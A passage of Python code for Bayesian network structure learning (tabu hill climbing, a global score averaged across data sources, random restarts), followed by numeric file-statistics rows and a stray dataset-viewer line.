best_score_delta = 0
best_operation = None
for operation, score_delta in self._legal_operations(current_model, tabu_list, max_indegree):
if score_delta > best_score_delta:
best_operation = operation
best_score_delta = score_delta
print(best_operation)
print(best_score_delta)
if best_operation is None or best_score_delta < epsilon:
break
elif best_operation[0] == '+':
current_model.add_edge(*best_operation[1])
tabu_list = ([('-', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == '-':
current_model.remove_edge(*best_operation[1])
tabu_list = ([('+', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == 'flip':
X, Y = best_operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([best_operation] + tabu_list)[:tabu_length]
self.structure_history.append(current_model.edges)
return current_model
def global_score(self, model):
score = 0
for node in model.nodes():
scores = []
for index in self.variable_source_mapping[node]:
nodes = list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
set([node] + list(model.predecessors(node)))))
if len(nodes) > 0:
continue
scores.append(self.scoring_methods[index].local_score(node, list(model.predecessors(node))))
score += sum(scores) / len(scores)
return score
def random_restart(self, start=None, tabu_length=0, max_indegree=None):
# starting best model
if not start:
best_model = self.estimate(tabu_length=tabu_length, max_indegree=max_indegree)
else:
best_model = start
best_score = self.global_score(best_model)
# iterate random restarts
for i in range(self.n_random_restarts):
current_model = best_model.copy()
n_moves = i + self.random_restart_length
tabu_list = []
# perform random actions
for j in range(n_moves):
operations = []
for operation in self._legal_operations_without_score(current_model, tabu_list, max_indegree):
operations.append(operation)
try:
operation = random.choice(operations)
except IndexError:
continue
# perform operation
if operation[0] == '+':
current_model.add_edge(*operation[1])
tabu_list = ([('-', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == '-':
current_model.remove_edge(*operation[1])
tabu_list = ([('+', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == 'flip':
X, Y = operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([operation] + tabu_list)[:tabu_length]
# hill climbing
print('----- hill climbing -----')
current_model = self.estimate(start=current_model, tabu_list=tabu_list,
tabu_length=tabu_length, max_indegree=max_indegree)
current_score = self.global_score(current_model)
# compare with the best model
if current_score > best_score:
best_model = current_model
best_score = current_score
return best_model.copy()
| 48.401907
| 119
| 0.559743
| 4,134
| 35,527
| 4.601113
| 0.085389
| 0.006624
| 0.004626
| 0.013669
| 0.838915
| 0.819515
| 0.810315
| 0.798065
| 0.793859
| 0.793281
| 0
| 0.007512
| 0.347989
| 35,527
| 733
| 120
| 48.46794
| 0.813633
| 0.225716
| 0
| 0.806383
| 0
| 0
| 0.011073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034043
| false
| 0
| 0.014894
| 0.002128
| 0.080851
| 0.012766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.